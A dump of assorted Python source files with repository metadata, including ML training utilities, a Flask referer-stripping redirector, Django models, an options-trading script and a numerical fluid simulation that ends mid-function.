self.opt.update({
key: os.path.join(opt['output:base_dir'], opt[key])
for key in ['output:log_dir', 'output:checkpoint_dir', 'output:hdf5_dir']
})
self.overwrite_output = overwrite_output
def print_output_directories(self):
print("Model directory:", self.opt['output:checkpoint_dir'])
print("Log directory:", self.opt['output:log_dir'])
print("HDF5 directory:", self.opt['output:hdf5_dir'])
def _find_next_run_number(self, folder):
if not os.path.exists(folder): return 0
files = os.listdir(folder)
files = sorted([f for f in files if f.startswith('run')])
if len(files) == 0:
return 0
return int(files[-1][3:])
def make_output_directories(self):
opt = self.opt
if opt['output:experiment_name'] is None:
nextRunNumber = max(self._find_next_run_number(opt['output:log_dir']),
self._find_next_run_number(opt['output:checkpoint_dir'])) + 1
print('Current run: %05d' % nextRunNumber)
runName = 'run%05d' % nextRunNumber
else:
runName = opt['output:experiment_name']
self.overwrite_output = True
self.log_dir = os.path.join(opt['output:log_dir'], runName)
self.checkpoint_dir = os.path.join(opt['output:checkpoint_dir'], runName)
self.hdf5_file = os.path.join(opt['output:hdf5_dir'], runName + ".hdf5")
if self.overwrite_output and (os.path.exists(self.log_dir) or os.path.exists(self.checkpoint_dir) or os.path.exists(self.hdf5_file)):
print(f"Warning: Overwriting previous run with name {runName}")
if os.path.exists(self.log_dir):
shutil.rmtree(self.log_dir)
os.makedirs(self.log_dir, exist_ok=self.overwrite_output)
os.makedirs(self.checkpoint_dir, exist_ok=self.overwrite_output)
os.makedirs(opt['output:hdf5_dir'], exist_ok=True)
def store_script_info(self):
with open(os.path.join(self.checkpoint_dir, 'args.json'), "w") as f:
json.dump(self.opt, f, indent=4, sort_keys=True)
with open(os.path.join(self.checkpoint_dir, 'cmd.txt'), "w") as f:
import shlex
f.write('cd "%s"\n' % os.getcwd())
f.write(' '.join(shlex.quote(x) for x in sys.argv) + "\n")
def opt_string(self):
return str(self.opt)
def get_tensorboard_summary(self):
self.writer = SummaryWriter(self.log_dir)
self.writer.add_text('info', self.opt_string(), 0)
return self.writer
def get_hdf5_summary(self):
hdf5_file = h5py.File(self.hdf5_file, 'w')
for k, v in self.opt.items():
try:
hdf5_file.attrs[k] = v
except TypeError as ex:
print(f'[WARN] Exception {ex} while saving attribute {k} = {v}')
try:
git_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD']).decode('ascii').strip()
hdf5_file.attrs['git'] = git_commit
print("[INFO] Git commit:", git_commit)
except:
print("[WARN] Storage manager was unable to get git commit.")
return hdf5_file
@staticmethod
def save_network(network):
weights_bytes = io.BytesIO()
torch.save(network.state_dict(), weights_bytes)
return np.void(weights_bytes.getbuffer())
def initialize_hdf5_storage(self, hdf5_file, num_epochs, num_epochs_with_save, loss_names, network):
self.times = hdf5_file.create_dataset("times", (num_epochs,), dtype=np.float32)
self.losses = dict([
(name, hdf5_file.create_dataset(name, (num_epochs,), dtype=np.float32))
for name in loss_names
])
self.epochs = hdf5_file.create_dataset("epochs", (num_epochs,), dtype=int)
self.weights = hdf5_file.create_dataset(
"weights",
(num_epochs_with_save, self.save_network(network).shape[0]),
dtype=np.dtype('V1'))
self.export_weights_counter = 0
self.export_stats_counter = 0
return self
def _check_for_attribute(self, *attrs):
for attr in attrs:
if not hasattr(self, attr):
raise AttributeError(f'[ERROR] StorageManager does not have {attr} initialized yet!')
def store_torch_checkpoint(self, epoch, network):
self._check_for_attribute('checkpoint_dir')
model_out_path = os.path.join(self.checkpoint_dir, "model_epoch_{}.pth".format(epoch if epoch >= 0 else "init"))
state = {
StorageManager.CheckpointKey.EPOCH: epoch + 1,
StorageManager.CheckpointKey.MODEL: network,
StorageManager.CheckpointKey.PARAMETERS: self.opt}
torch.save(state, model_out_path)
print("Checkpoint saved to {}".format(model_out_path))
def store_hdf5_checkpoint(self, network):
self._check_for_attribute('weights')
self.weights[self.export_weights_counter, :] = self.save_network(network)
self.export_weights_counter = self.export_weights_counter + 1
def update_training_metrics(self, epoch, losses, num_batches, lr):
self._check_for_attribute('writer')
for k, v in losses.items():
self.writer.add_scalar('train/%s' % k, v / num_batches, epoch)
self.writer.add_scalar('train/lr', lr, epoch)
def update_validation_metrics(self, epoch, losses, num_batches, run_time):
self._check_for_attribute('writer', 'times', 'losses', 'epochs')
for k, v in losses.items():
self.writer.add_scalar('val/%s' % k, v / num_batches, epoch)
self.times[self.export_stats_counter] = run_time
for k, v in losses.items():
self.losses[k][self.export_stats_counter] = v / num_batches
self.epochs[self.export_stats_counter] = epoch
self.export_stats_counter += 1
def store_image(self, epoch, image):
self._check_for_attribute('writer')
img_np = np.array(image)
imageio.imwrite(os.path.join(self.log_dir, ("e%d.png" % epoch) if epoch >= 0 else "eInit.png"), img_np)
self.writer.add_image('vis', np.moveaxis(img_np, (0, 1, 2), (1, 2, 0)), epoch)
|
[
"kevin.hoehlein@tum.de"
] |
kevin.hoehlein@tum.de
|
fdadcbf64f422cf13ee2fb4e35986b9fa8f0d439
|
d8c32144001fc77c23aee731d6ce768fac72ed3d
|
/builder.py
|
6805711e0b173147c02dc6cd876963810ff23a1b
|
[] |
no_license
|
Shubham617/Text-Suggestions-Auto-Complete
|
21ddc704b83ca3def32a130d695312f5824c6839
|
81fb03c2986175a50dae98e4bef294e09b262728
|
refs/heads/master
| 2021-06-20T16:02:52.800920
| 2017-07-30T19:10:44
| 2017-07-30T19:10:44
| 98,810,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
import suffix
import prefix
from functools import *
NONWORD = '\n'
def build(name):
return build_chain(add_to_chain, pairs_gen(name, line_gen), suffix.empty_suffix())
def build_chain(fxn, gen_obj, imm_obj):
return reduce(fxn, gen_obj, imm_obj)
def add_to_chain(chain, pair):
if (chain.get(pair[0])) == None:
#sfx = suffix.empty_suffix()
return chain.put(pair[0], suffix.add_word(suffix.empty_suffix(), pair[1]))
#sfx.put(pair[1], 1))
return chain.put(pair[0], suffix.add_word(chain.get(pair[0]), pair[1]))
def line_gen(name):
with open(name) as in_file:
data = in_file.readlines()
for line in data:
yield line
def pairs_gen(name, gen_fxn):
gen = gen_fxn(name)
start = prefix.new_prefix(NONWORD, NONWORD)
for line in gen:
lst = list(line.split())
for i in lst:
copy = start
start = prefix.shift_in(start,i)
yield ((copy),i)
yield ((start), NONWORD)
|
[
"smlakers@gmail.com"
] |
smlakers@gmail.com
|
91a24e930254656db82201045c6bbcefad002019
|
5410c449f2e869aeb795c044c16984d2f4c7241f
|
/dereferer/app.py
|
75ac600a0598d68b08452a54619bd1200be83882
|
[] |
no_license
|
jcsaaddupuy/dereferer
|
7505085f65bc9abd1524d7471d9ed4c3ba9f40ed
|
edda3740a5a9b3431b86ecd0b08577a46010693f
|
refs/heads/master
| 2016-09-05T20:12:34.441938
| 2015-08-26T20:10:12
| 2015-08-26T20:10:12
| 41,445,432
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,669
|
py
|
from __future__ import unicode_literals
import logging
import logging.config
import os
from flask import Flask
from flask import request
try:
from urllib.parse import urlparse, unquote, parse_qsl, urlencode
except:
from urlparse import urlparse, parse_qsl
from urllib import unquote, urlencode
import requests
class ReverseProxied(object):
'''Wrap the application in this middleware and configure the
front-end server to add these headers, to let you quietly bind
this to a URL other than / and to an HTTP scheme that is
different than what is used locally.
In nginx:
location /myprefix {
proxy_pass http://192.168.0.1:5001;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Scheme $scheme;
proxy_set_header X-Script-Name /myprefix;
}
:param app: the WSGI application
snippet from http://flask.pocoo.org/snippets/35/
'''
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
script_name = environ.get('HTTP_X_SCRIPT_NAME', '')
if script_name:
environ['SCRIPT_NAME'] = script_name
path_info = environ['PATH_INFO']
if path_info.startswith(script_name):
environ['PATH_INFO'] = path_info[len(script_name):]
scheme = environ.get('HTTP_X_SCHEME', '')
if scheme:
environ['wsgi.url_scheme'] = scheme
return self.app(environ, start_response)
app = Flask(__name__)
app.wsgi_app = ReverseProxied(app.wsgi_app)
logging_conf = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.conf')
logging.config.fileConfig(logging_conf)
index_tpl = """
<html>
<head>
<title>dereferer</title>
</head>
<body>
<h1>What is it?</h1>
<p>This application let you remove http referer for links you visit.</p>
<h1>How?</h1>
<p>Simply use '{host_url}?' or '{host_url}?u=' in front of your url.</p>
<p>Example : <a href='{host_url}?http://www.whatismyreferer.com/'>{host_url}?http://www.whatismyreferer.com/</a></p>
<h1>Test it</h1>
<p>
<form action='{host_url}?'>
<label for='u'>Enter an url : <label/>
<input name='u' type='text' size='31' value='http://www.whatismyreferer.com'/>
<input type='submit' value='Go'/>
</form>
</p>
</body>
</html>
"""
redirect_tpl = """
<html>
<head>
<title>redirecting...</title>
<meta http-equiv="refresh" content="0; URL={url}" />
</head>
<body>
<p>you are being redirected to<br />
<a id="autoclick" rel="noreferrer" href="{url}">{url}</a></p>
</body>
<script language="JavaScript" type="text/javascript">
window.setTimeout( document.getElementById('autoclick').click() , 1000 * 0.5);
</script>
</html>
"""
KNOWN_SHORTNERZ = (
'goo.gl',
'bit.ly',
't.co',
'ow.li',
'tr.im',
'is.gd',
'tiny.cc',
'tinyurl.com',
'bit.do',
'fb.me',
)
def _follow(url):
""" Follows 301 and 302 redirect and extract location for url matches known
shortners """
try:
urlp = urlparse(url)
except Exception:
app.logger.exception("Could not parse %s", url)
else:
if urlp.netloc not in ('localhost', '127.0.0.1', request.host)\
and urlp.netloc in KNOWN_SHORTNERZ\
and urlp.scheme:
try:
app.logger.info("Following %s", url)
resp = requests.head(url, allow_redirects=False, timeout=1)
if resp.ok and resp.status_code in (301, 302):
url = resp.headers.get('Location')
if not url:
# could not get location with 'L', try lowercase
# and fallback to original url
url = resp.headers.get('location', url)
app.logger.info("URL is a redirection. Next url %s", url)
except Exception:
app.logger.exception("Could not get head at url %s", url)
return url
ANNOYING_PARAMS = (
'utm_',
'action_object_map', 'action_ref_map', 'action_type_map', 'fb_',
'__scoop',
'xtor',
)
def cleanup(url):
url = _follow(url)
# remove trackers params
try:
urlp = urlparse(url)
# cleanup query param
query = parse_qsl(urlp.query)
# only if query is non empty and we manage to parse fragment as
# key/value
if urlp.query and query:
for annoying in ANNOYING_PARAMS:
query = [(x, y) for x, y in query if not x.startswith(annoying)]
urlp = urlp._replace(
query=urlencode(query),
)
# cleanup fragment param
fragment = parse_qsl(urlp.fragment)
# only if fragments is non empty and we manage to parse fragment as
# key/value
if urlp.fragment and fragment:
for annoying in ANNOYING_PARAMS:
fragment = [(x, y) for x, y in fragment if not x.startswith(annoying)]
urlp = urlp._replace(
fragment=urlencode(fragment),
)
url = urlp.geturl()
except Exception:
app.logger.exception("Problem cleaning url %s", url)
app.logger.info("Final url %s", url)
return url
@app.route("/", methods=['GET', ])
def index():
if len(request.args):
url = unquote(
request.args.get('u', request.url.split('?')[-1])
)
return redirect_tpl.format(url=cleanup(url))
return index_tpl.format(host_url=request.url)
app.logger.info("Up and running")
if __name__ == "__main__":
app.run(debug=True)
|
[
"jc.saaddupuy@fsfe.org"
] |
jc.saaddupuy@fsfe.org
|
3ac04967e2384947a97b1002bf6624d0e7228ae1
|
8a10ecca2519bdf18209eaa6d581fc05d82068c6
|
/pmoApp/context_processors.py
|
0b0948d9a4c7320feae190e1e18912d64e3662a3
|
[] |
no_license
|
juthebest/pmoNesims
|
1cca36c705f47d1a8b78eb23a00c67ce14cb8f17
|
2ed6bac546b37cb6afb8faee695fecb25b90b721
|
refs/heads/master
| 2020-12-04T10:13:37.142611
| 2018-04-05T08:13:20
| 2018-04-05T08:13:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
from .models import *
from django.shortcuts import render
def crisis(request):
return{
'showCrisisList': list(CMOPlanReport.objects.all())
}
def status(request):
querylist1 = []
caseIds = CMOPlanReport.objects.values_list('caseID')
for i in range(len(caseIds)):
qs1=statusReport.objects.filter(caseID_id=caseIds[i]).last()
if qs1:
querylist1.append(qs1)
return{
'filterStatus': querylist1
}
|
[
"nurhayatichua@gmail.com"
] |
nurhayatichua@gmail.com
|
e7ffe724681f4837b1cb1f95ec038554a19de877
|
34c7b11feaa350873d1428212c268b8111617759
|
/trainer/sub_trainer/train_only_cnn.py
|
051293ef8967a06c362d89e700b62ac0c33853ca
|
[] |
no_license
|
Ryu0w0/ConvAutoencoder
|
ea9b34bb644f8ebed1358e9ff0c8b7090fbf1892
|
879d71aec3c1ce4723110ddab105db5cf24180fe
|
refs/heads/master
| 2023-01-20T09:29:51.101520
| 2020-11-15T07:49:11
| 2020-11-15T07:49:11
| 308,183,519
| 1
| 0
| null | 2020-11-15T07:49:13
| 2020-10-29T01:21:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,686
|
py
|
import numpy as np
import torch
import torch.nn.functional as F
from utils.global_var import TrainType
from utils import global_var as glb
from utils.seed import seed_everything
from utils.early_stop import EarlyStopping
from torch.utils.data.dataloader import DataLoader
from trainer.abstrainer import AbsTrainer
from trainer.stat_collector import StatCollector
class TrainOnlyCNN(AbsTrainer):
"""
Training CNN for a single epoch.
"""
def __init__(self, cv_dataset, args, config, device):
super().__init__(cv_dataset, args, config, device)
self.stat_collector = StatCollector(self.cv_dataset.classes, args)
@staticmethod
def _get_early_stopping():
return EarlyStopping(min_delta=0.0001, improve_range=10, score_type="acc")
def _train_epoch(self, cur_fold, cur_epoch, num_folds, model, optimizer,
dataset, mode: TrainType, es=None):
"""
Train CNN for a single epoch.
model: instance of CNN
dataset: instance of sub-class of AbstractCIFAR10
mode: glb.cv_train or glb.cv_valid
es: instance of EarlyStopping
"""
seed_everything()
loader = DataLoader(dataset, batch_size=self.args.batch_size, shuffle=True)
total_loss = 0
preds = []
gt_labels = []
if mode == TrainType.CV_TRAIN:
model.train()
else:
model.eval()
# training iteration
for id, batch in enumerate(loader):
images, labels = batch
images, labels = images.to(self.device), labels.long().to(self.device)
output = model(images) # shape: (data_num, class_num)
output = F.log_softmax(output, dim=1)
loss = F.nll_loss(output, labels)
if mode == TrainType.CV_TRAIN:
optimizer.zero_grad()
loss.backward()
optimizer.step()
# collect statistics
total_loss += loss.detach().cpu().item()
_, predicted = torch.max(output.detach().cpu(), 1)
preds.extend(predicted.tolist())
gt_labels.extend(labels.detach().cpu().tolist())
if mode == TrainType.CV_VALID:
# logging statistics
mean_loss, stats = self.stat_collector.calc_stat_cnn(total_loss, np.array(preds), np.array(gt_labels))
self.stat_collector.logging_stat_cnn(mode=mode.value, cur_fold=cur_fold, cur_epoch=cur_epoch,
mean_loss=mean_loss, stats=stats, num_folds=self.num_folds)
# record score for early stopping
es.set_stop_flg(mean_loss, stats["accuracy"])
|
[
"flymetothemoon0w0@gmail.com"
] |
flymetothemoon0w0@gmail.com
|
cc2478d9ebb6271fb58d0503a00d18aa97ffb37c
|
17ecb7acac9b647d694c397db33d58f2899137ee
|
/kivy/aulas/Seção 19 - Orientação a Objeto II/Decorators.py
|
1596bfc0c75c937b3b5aac70bcbb6a2dcd759609
|
[] |
no_license
|
PedroRamos360/PythonCourseUdemy
|
c7f3af1c6bf4aaab9296794ebab517c3a57b9b87
|
b834918017c8ed6b3b306644cd122bf3ebb770ef
|
refs/heads/master
| 2020-12-27T10:00:44.830784
| 2020-10-06T22:12:04
| 2020-10-06T22:12:04
| 237,859,157
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
class A:
def __int__(self):
self._var = 0
@property
def var(self):
return self._var
@var.setter
def var(self, x):
self._var = x
a = A()
a.var = 10
t = a.var
print(t)
|
[
"53490820+PedroRamos360@users.noreply.github.com"
] |
53490820+PedroRamos360@users.noreply.github.com
|
a0b57ef38ca9b18ba125d1c6f7bc15324c4b36c6
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/caffe2/python/mkl/mkl_sbn_speed_test.py
|
181f58e1350d04d4f2a1ee6bfd89f06fe947516a
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080
| 2021-07-25T17:51:27
| 2021-07-25T17:51:27
| 389,390,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:d7ccfc28b48531f34b0173911a02184968225b607033f39386215d31af9bbe20
size 4605
|
[
"yamprakash130@gmail.com"
] |
yamprakash130@gmail.com
|
9f1b20c80154b75ac89fc586ccd025df92557063
|
91b72a74fdb575ac3070e3cdecca939cf6d9fe23
|
/damhwa_server/django_server/django_server/kobertmodel/models.py
|
c3a1d7075fd9e823ce9f065f4aa8346e0609dfac
|
[] |
no_license
|
minkpang/Damwha
|
5dce00481ea5a017944f223e6099d41a157e24c8
|
b2e070c93fd2c6e7959bb7f2c7cd36fe5b998693
|
refs/heads/master
| 2023-08-17T20:31:00.341261
| 2021-10-07T15:59:21
| 2021-10-07T15:59:21
| 416,627,247
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,758
|
py
|
from django.db import models
class Flower(models.Model):
fno = models.BigIntegerField(primary_key=True)
fnamekr = models.CharField(db_column='fnameKR', max_length=40, blank=True, null=True) # Field name made lowercase.
fnameen = models.CharField(db_column='fnameEN', max_length=40, blank=True, null=True) # Field name made lowercase.
fmonth = models.IntegerField(blank=True, null=True)
fday = models.IntegerField(blank=True, null=True)
flang = models.CharField(max_length=100, blank=True, null=True)
fcontents = models.CharField(max_length=500, blank=True, null=True)
fuse = models.CharField(max_length=500, blank=True, null=True)
fgrow = models.CharField(max_length=500, blank=True, null=True)
img1 = models.CharField(max_length=400, blank=True, null=True)
img2 = models.CharField(max_length=400, blank=True, null=True)
img3 = models.CharField(max_length=400, blank=True, null=True)
watercolor_img = models.CharField(max_length=400, blank=True, null=True)
class Meta:
managed = False
db_table = 'flower'
class History(models.Model):
hno = models.BigIntegerField(primary_key=True)
userno = models.ForeignKey('User', models.DO_NOTHING, db_column='userno', blank=True, null=True)
fno = models.ForeignKey(Flower, models.DO_NOTHING, db_column='fno', blank=True, null=True)
htype = models.IntegerField(blank=True, null=True)
contents = models.CharField(max_length=500, blank=True, null=True)
to = models.CharField(max_length=100, blank=True, null=True)
regdate = models.DateTimeField(blank=True, null=True)
class Meta:
managed = False
db_table = 'history'
class User(models.Model):
userno = models.BigIntegerField(primary_key=True)
email = models.CharField(max_length=50)
username = models.CharField(max_length=30, blank=True, null=True)
profile = models.CharField(max_length=400, blank=True, null=True)
token = models.CharField(max_length=500, blank=True, null=True)
class Meta:
managed = False
db_table = 'user'
class Emotion(models.Model):
fno = models.BigIntegerField(primary_key=True)
happy = models.FloatField(db_column='Happy', blank=True, null=True) # Field name made lowercase.
unstable = models.FloatField(db_column='Unstable', blank=True, null=True) # Field name made lowercase.
embarrass = models.FloatField(blank=True, null=True)
sad = models.FloatField(blank=True, null=True)
angry = models.FloatField(blank=True, null=True)
hurt = models.FloatField(blank=True, null=True)
emotion = models.TextField(db_column='Emotion', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'emotion'
|
[
"rlawjddbs963@naver.com"
] |
rlawjddbs963@naver.com
|
c2ad6cae3eb2872835f29d5b9bb302dc9eab7878
|
257c34e5dc6bde685659950c755335afee6c028f
|
/blog/utils/api_clients/backend/exceptions.py
|
d44d2562d4cbe0843fdd3938c1eb330a99d19417
|
[] |
no_license
|
smtkey/probegin
|
6cadc4e88389670d7bce457c6fda01b82d965738
|
f6f2598237fabfd3ffbc7726dc1c600072e0f107
|
refs/heads/master
| 2021-01-15T20:28:54.458390
| 2017-08-14T08:08:34
| 2017-08-14T08:08:34
| 99,852,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,050
|
py
|
api_exception_register = dict()
class APIClientErrorRegistry(type):
"""
Registers error codes and class signatures into a global exception register
which is able to map error codes to a specific exception.
"""
def __new__(cls, name, bases, attrs):
"""
Put the error code and class signature into the register when the class
is defined.
"""
exception_class = super(APIClientErrorRegistry, cls).__new__(cls, name, bases, attrs)
# Register the error code with this class signature
if exception_class.code is not None:
api_exception_register[exception_class.code] = exception_class
return exception_class
class APIClientError(Exception):
"""
An all purpose exception which is used when something went wrong with the
API client, either during the request or during the response.
"""
__metaclass__ = APIClientErrorRegistry
code = 'internal_error'
class PostUnknownAPIClientError(APIClientError):
code = 'post_unknown'
|
[
"wonderer000@google.com"
] |
wonderer000@google.com
|
8f9754d9000261cf1c7f19388864972753850d1f
|
fd9bdf53fcef992734b937cb2d0f9d58bd9d9ead
|
/scripts/test_options.py
|
90528db7967e3554f5fecb0edadc510c65c888c0
|
[] |
no_license
|
babakopti/opti-trade
|
ec62f9b387b99838e3a9012b27e23d9da869072e
|
a01bfaa7c9792cb816cd3bb4f3a50fe3ba580a10
|
refs/heads/master
| 2023-08-19T10:56:57.207717
| 2023-08-13T02:16:33
| 2023-08-13T02:16:33
| 201,105,006
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
# ***********************************************************************
# Import libraries
# ***********************************************************************
import sys
import os
import dill
import datetime
import time
import numpy as np
import pandas as pd
sys.path.append( os.path.abspath( '../' ) )
import utl.utils as utl
from prt.prt import MfdOptionsPrt
# ***********************************************************************
# Input parameters
# ***********************************************************************
modFile = 'models/model_long_term_snap_2020_01_31.dill'
curDate = '2020-02-11'
maxDate = '2020-05-30'
indices = [ 'INDU', 'NDX', 'SPX', 'RUT', 'OEX',
'MID', 'SOX', 'RUI', 'RUA', 'TRAN',
'HGX', 'TYX', 'XAU' ]
futures = [ 'ES', 'NQ', 'US', 'YM', 'RTY', 'EMD', 'QM' ]
ETFs = [ 'QQQ', 'SPY', 'DIA', 'MDY', 'IWM', 'OIH',
'SMH', 'XLE', 'XLF', 'XLU', 'EWJ' ]
cash = 20000
# ***********************************************************************
# Get asset prices
# ***********************************************************************
if False:
assetHash = {'QQQ': 234.35, 'SPY': 337.4, 'DIA': 295.87, 'MDY': 380.93, 'IWM': 168.12, 'OIH': 11.4, 'SMH': 151.0, 'XLE': 55.08, 'XLF': 31.14, 'XLU': 69.2, 'EWJ': 59.443000000000005, 'ES': 3371.75, 'NQ': 9594.25, 'US': 162.0, 'YM': 29445, 'RTY': 1685.7, 'EMD': 2086.4, 'QM': 51.5, 'INDU': 29276.34, 'NDX': 9517.86, 'SPX': 3357.75, 'RUT': 1677.515, 'OEX': 1508.33, 'MID': 2076.67, 'SOX': 1931.08, 'RUI': 1857.118, 'RUA': 1965.181, 'TRAN': 10902.72, 'HGX': 375.83, 'TYX': 20.51, 'XAU': 102.87}
else:
print( 'Getting assetHash...' )
t0 = time.time()
assetHash = {}
for symbol in ETFs:
val, date = utl.getKibotLastValue( symbol,
sType = 'ETF' )
assetHash[ symbol ] = val
for symbol in futures:
val, date = utl.getKibotLastValue( symbol,
sType = 'futures' )
assetHash[ symbol ] = val
for symbol in indices:
val, date = utl.getKibotLastValue( symbol,
sType = 'index' )
assetHash[ symbol ] = val
print( 'Done with getting assetHash! Took %0.2f seconds!' % ( time.time() - t0 ) )
print( assetHash )
# ***********************************************************************
# Get options chain
# ***********************************************************************
options = []
for symbol in ETFs:
print( 'Getting options for %s...' % symbol )
tmpList = utl.getOptionsChain( symbol,
minExprDate = pd.to_datetime( curDate ) + datetime.timedelta( days = 2 ),
maxExprDate = maxDate,
minTradeDate = pd.to_datetime( curDate ) - datetime.timedelta( days = 2 ),
minVolume = 0,
minInterest = 0,
maxTries = 2,
logger = None )
options += tmpList
print( 'Found %d options contracts!' % len( options ) )
# ***********************************************************************
# Process options
# ***********************************************************************
prtObj = MfdOptionsPrt( modFile = modFile,
assetHash = assetHash,
curDate = curDate,
maxDate = maxDate,
maxPriceC = 2000.0,
maxPriceA = 4000.0,
minProb = 0.75,
rfiDaily = 0.0,
tradeFee = 0.0,
nDayTimes = 1140,
logFileName = None,
verbose = 1 )
print( 'Found %d eligible contracts..' % len( prtObj.sortOptions( options ) ) )
actDf = prtObj.getActionDf( cash, options )
print( actDf )
actDf.to_csv( 'actDf.csv', index = False )
|
[
"optilive.developer@gmail.com"
] |
optilive.developer@gmail.com
|
6ead493e481be2b90053998f4cf7e5c19a0a4ee9
|
17660b97a12343c177d766377afbd16787762fa7
|
/23/04/0.py
|
f66495e696b83b82c495f757d7542d6477f67afd
|
[
"CC0-1.0"
] |
permissive
|
pylangstudy/201706
|
a39caac815f65f226a6b34743f0a0a4eac33ec8e
|
f1cc6af6b18e5bd393cda27f5166067c4645d4d3
|
refs/heads/master
| 2023-01-07T21:25:12.756348
| 2017-06-30T00:35:24
| 2017-06-30T00:35:24
| 93,048,112
| 0
| 1
| null | 2022-12-21T12:10:46
| 2017-06-01T10:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 67
|
py
|
import math
print(math.cos(math.pi / 4))
print(math.log(1024, 2))
|
[
"pylangstudy@yahoo.co.jp"
] |
pylangstudy@yahoo.co.jp
|
175d9355251e09ef5187142c0464e14e0f2c22c8
|
51d7133f43573c0c04b9dd5020e0d346cf3ae3c3
|
/Assignment 2/Task4.py
|
7f27f492aca33df92fb5be767cf3b2f2f96a2536
|
[] |
no_license
|
bilaltanveer/System-Programming
|
c1c9fa28d2a0f36917b3fdbc00c989053b91f70c
|
b033daa21b791f943abd4a81d9ac77b08eaabe8a
|
refs/heads/master
| 2021-01-24T16:33:48.497287
| 2018-05-20T20:44:39
| 2018-05-20T20:44:39
| 123,203,523
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 623
|
py
|
import os
import psutil
import time
import datetime
def Info(id):
p=psutil.Process(id)
print("Id: ", id)
print("Name: ", p.name())
print("Status: ", p.status())
print("Parent ID: ", p.ppid() )
print("Parent Name: ", psutil.Process(p.ppid()).name())
print("Memory Info: ", p.memory_info().rss)
print("Process Creation Time: ", datetime.datetime.fromtimestamp(p.create_time()).strftime("%Y-%m-%d %H:%M:%S"))
print("Files Opened by the Process Info: ", p.open_files())
def main():
id=input("Enter the id:")
Info(int(id))
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
bilaltanveer.noreply@github.com
|
3fcad67a6b4faa1a140caa80ece18bf5c3ad6f7c
|
227f1ac6ff6c51d76631a05505dc45377ccfb3ff
|
/venv/Scripts/easy_install-3.8-script.py
|
6d9716542d102914b810279f8d549ac895ae6543
|
[] |
no_license
|
roshan-karkera/tree
|
aaaed5de47e4b93226530ef126b7e43f623d8201
|
34e67c98053b7d4da4930bdf7329ca557ac75cd8
|
refs/heads/master
| 2022-12-15T18:56:05.336400
| 2020-09-10T18:20:31
| 2020-09-10T18:20:31
| 294,485,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 461
|
py
|
#!C:\Users\Admin\PycharmProjects\turtledemo\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.8'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.8')()
)
|
[
"roshan.karkera12345@gmail.com"
] |
roshan.karkera12345@gmail.com
|
e23df336881980f9ff533131c3aa7e30adbfa3f0
|
dfc827bf144be6edf735a8b59b000d8216e4bb00
|
/CODE/experimentcode/Thesis/Forced/GrowingGaussianBumpoverPeriodicBed/FEVMTrialsFix/htansformLiftSmooth/Run.py
|
b769f305f98097481de69f0986cb441b46247775
|
[] |
no_license
|
jordanpitt3141/ALL
|
c5f55e2642d4c18b63b4226ddf7c8ca492c8163c
|
3f35c9d8e422e9088fe096a267efda2031ba0123
|
refs/heads/master
| 2020-07-12T16:26:59.684440
| 2019-05-08T04:12:26
| 2019-05-08T04:12:26
| 94,275,573
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,230
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 14:24:26 2017
@author: jp
"""
from Serre2dc import *
from scipy import *
from pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog
import csv
import os
from numpy.linalg import norm,solve
from time import time
def copyarraytoC(a):
n = len(a)
b = mallocPy(n)
for i in range(n):
writetomem(b,i,a[i])
return b
def copyarrayfromC(a,n):
b = [0]*n
for i in range(n):
b[i] = readfrommem(a,i)
return b
def copywritearraytoC(a,b):
n = len(a)
for i in range(n):
writetomem(b,i,a[i])
def makevar(sx,ex,dx,st,et,dt):
x = arange(sx, ex, dx)
t = arange(st, et, dt)
return x,t
def ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx):
n = len(x)
h = zeros(n)
w = zeros(n)
b= zeros(n)
u = zeros(n)
G = zeros(n)
for i in range(n):
phi = x[i] - a2*t
h[i] = a0 + a1*exp(-(phi - a3)**2/(2*a4))*exp(a5*t)
u[i] = a6*exp(-(phi - a3)**2/(2*a4))*exp(a7*t)
b[i] = a8*sin(a9*x[i])
w[i] = h[i] + b[i]
hxi = -a1/a4*(phi - a3)*exp(-(phi - a3)**2/(2*a4))*exp(a5*t)
uxi = -a6/a4*(phi - a3)*exp(-(phi - a3)**2/(2*a4))*exp(a7*t)
uxxi = -a6/(a4**2)*exp(-(phi - a3)**2/(2*a4))*(a4 - ((phi) - a3)**2)*exp(a7*t)
bxi = a8*a9*cos(a9*x[i])
